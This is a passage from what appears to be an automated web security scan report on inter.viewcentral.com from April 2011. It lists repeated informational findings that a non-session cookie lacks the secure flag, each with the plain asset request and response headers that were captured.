11.26. https://inter.viewcentral.com/events/images/border/trans_spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/images/border/trans_spacer.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/images/border/trans_spacer.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 855
Content-Type: image/gif
Last-Modified: Fri, 18 Feb 2005 19:55:44 GMT
Accept-Ranges: bytes
ETag: "020b8d4f315c51:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:40 GMT

GIF89a..".......3..f............3.33.f3..3..3..3..f.3f.ff..f..f..f....3..f..............3..f..............3..f.............33.3f.3..3..3..3.33333f33.33.33.33.f33f3ff3.f3.f3.f3..33.3f.3..3..3..3..33.3f
...[SNIP]...

11.27. https://inter.viewcentral.com/events/images/loading_0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/images/loading_0.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/images/loading_0.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 7076
Content-Type: image/gif
Last-Modified: Sat, 24 May 2008 02:06:10 GMT
Accept-Ranges: bytes
ETag: "ee7f88bc42bdc81:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:41 GMT

GIF89a . ..........................................................................................................w.w.........f.f........................S.S...............J.JB.B...............y.y....
...[SNIP]...

11.28. https://inter.viewcentral.com/events/images/loading_1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/images/loading_1.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/images/loading_1.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 7076
Content-Type: image/gif
Last-Modified: Sat, 24 May 2008 02:06:31 GMT
Accept-Ranges: bytes
ETag: "3c9ca8c842bdc81:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:41 GMT

GIF89a . ..........................................................................................................w.w.........f.f........................S.S...............J.JB.B...............y.y....
...[SNIP]...

11.29. https://inter.viewcentral.com/events/images/loading_2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/images/loading_2.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/images/loading_2.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 7076
Content-Type: image/gif
Last-Modified: Sat, 24 May 2008 02:06:49 GMT
Accept-Ranges: bytes
ETag: "73add342bdc81:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:41 GMT

GIF89a . ..........................................................................................................w.w.........f.f........................S.S...............J.JB.B...............y.y....
...[SNIP]...

11.30. https://inter.viewcentral.com/events/images/loading_3.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/images/loading_3.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/images/loading_3.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 7076
Content-Type: image/gif
Last-Modified: Sat, 24 May 2008 02:07:10 GMT
Accept-Ranges: bytes
ETag: "a7f6e4df42bdc81:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:41 GMT

GIF89a . ..........................................................................................................w.w.........f.f........................S.S...............J.JB.B...............y.y....
...[SNIP]...

11.31. https://inter.viewcentral.com/events/images/poweredby1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/images/poweredby1.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/images/poweredby1.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 2242
Content-Type: image/gif
Last-Modified: Tue, 03 Apr 2007 00:46:24 GMT
Accept-Ranges: bytes
ETag: "f4b629818975c71:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:40 GMT

GIF89a..*........7~@i.............D.`........0]................ P.Pv.......p..wtu.................u.m..i".................................................7~...Ga....p..6U.
<..;.;Y.$K.................
...[SNIP]...

11.32. https://inter.viewcentral.com/events/incl/BusyBox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/incl/BusyBox.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/incl/BusyBox.js HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 3465
Content-Type: application/x-javascript
Last-Modified: Sat, 24 May 2008 02:09:13 GMT
Accept-Ranges: bytes
ETag: "14fc232943bdc81:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:35 GMT


// Define the BusyBox class (function)
function BusyBox(id, instanceVarName, imageCount, imageName, imageExt, imageDelay, width, height, url)
{
   // Initialize object
   this.id = id;
   this.Imag
...[SNIP]...

11.33. https://inter.viewcentral.com/events/uploads/arcsight/ae.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/ae.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/ae.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 878
Content-Type: image/png
Last-Modified: Wed, 19 May 2010 23:04:50 GMT
Accept-Ranges: bytes
ETag: "d4907aafa7f7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:40 GMT

.PNG
.
...IHDR.............,.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W1r.@..:...:D.....]x..V...    ..e.    .    ...:..e...I..R..j.v..TM.@..loO3<l...f.g...6..\..LK.o.k$6.......M...OH..y.Tlp.bm..K.    
...[SNIP]...

11.34. https://inter.viewcentral.com/events/uploads/arcsight/arrow_red_dn.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/arrow_red_dn.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/arrow_red_dn.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 167
Content-Type: image/gif
Last-Modified: Tue, 30 Mar 2010 19:59:13 GMT
Accept-Ranges: bytes
ETag: "b8da2c7843d0ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:37 GMT

GIF89a    .    ..............99.??.''.KK.......99....00.00.......''.KK.......KK.......KK...........................!.......,....    .    ...$`&.di.....4)M.a.uN.,4.....R..$......;

11.35. https://inter.viewcentral.com/events/uploads/arcsight/arrow_red_rt.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/arrow_red_rt.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/arrow_red_rt.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 169
Content-Type: image/gif
Last-Modified: Tue, 30 Mar 2010 19:59:17 GMT
Accept-Ranges: bytes
ETag: "4e70e77a43d0ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:35 GMT

GIF89a    .    ..............99.??.''.KK.......99....00.00.......''.KK.......KK.......KK...........................!.......,....    .    ...&`.).h.......,DQEt.UN...=..fq`Y..V&.`...;

11.36. https://inter.viewcentral.com/events/uploads/arcsight/asu_css.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/asu_css.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/asu_css.css HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 4025
Content-Type: text/css
Last-Modified: Thu, 08 Apr 2010 17:51:56 GMT
Accept-Ranges: bytes
ETag: "4c7f3a2e44d7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:34 GMT

body {
   background: #cccccc url(https://inter.viewcentral.com/events/uploads/arcsight/bg_arstmain.jpg) repeat-x top;
   margin: 0;
   padding: 0 0 20px 0;
   text-align: left;
   color: #000000;
   font:
...[SNIP]...

11.37. https://inter.viewcentral.com/events/uploads/arcsight/asu_masthead_v02.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/asu_masthead_v02.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/asu_masthead_v02.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 54119
Content-Type: image/png
Last-Modified: Wed, 26 Jan 2011 18:22:57 GMT
Accept-Ranges: bytes
ETag: "a65175e86bdcb1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:41 GMT

.PNG
.
...IHDR.......D.............tEXtSoftware.Adobe ImageReadyq.e<...niTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.38. https://inter.viewcentral.com/events/uploads/arcsight/bg_arstfooter.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/bg_arstfooter.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/bg_arstfooter.jpg HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 569
Content-Type: image/jpeg
Last-Modified: Thu, 01 Apr 2010 22:25:49 GMT
Accept-Ranges: bytes
ETag: "8649ea47ead1ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:41 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................A....
...[SNIP]...

11.39. https://inter.viewcentral.com/events/uploads/arcsight/bg_arstmain.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/bg_arstmain.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/bg_arstmain.jpg HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 569
Content-Type: image/jpeg
Last-Modified: Tue, 30 Mar 2010 19:59:34 GMT
Accept-Ranges: bytes
ETag: "c0bea78443d0ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:35 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................A....
...[SNIP]...

11.40. https://inter.viewcentral.com/events/uploads/arcsight/bg_container.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/bg_container.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/bg_container.jpg HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 477
Content-Type: image/jpeg
Last-Modified: Thu, 08 Apr 2010 17:45:33 GMT
Accept-Ranges: bytes
ETag: "3473c4a43d7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:35 GMT

......JFIF.....d.d......Ducky.......d......Adobe.d......................................................................................................................................................
...[SNIP]...

11.41. https://inter.viewcentral.com/events/uploads/arcsight/bg_page.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/bg_page.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/bg_page.gif HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 178
Content-Type: image/gif
Last-Modified: Thu, 08 Apr 2010 17:36:25 GMT
Accept-Ranges: bytes
ETag: "94b3f5242d7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:35 GMT

GIF89a.......................................................!.......,........................................................../..I..8....`(.di.h..l..p,.tm.x|.|....pH,.....8...;

11.42. https://inter.viewcentral.com/events/uploads/arcsight/bg_sectionhdr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/bg_sectionhdr.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/bg_sectionhdr.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 4715
Content-Type: image/png
Last-Modified: Thu, 08 Apr 2010 17:36:44 GMT
Accept-Ranges: bytes
ETag: "de77afe42d7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:35 GMT

.PNG
.
...IHDR..............y.L...    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

11.43. https://inter.viewcentral.com/events/uploads/arcsight/catalog_employee.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/uploads/arcsight/catalog_employee.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /events/uploads/arcsight/catalog_employee.png HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
Referer: https://inter.viewcentral.com/events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Content-Length: 1768
Content-Type: image/png
Last-Modified: Wed, 28 Apr 2010 20:38:21 GMT
Accept-Ranges: bytes
ETag: "b30a8bd12e7ca1:11cb4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sun, 24 Apr 2011 20:18:40 GMT

.PNG
.
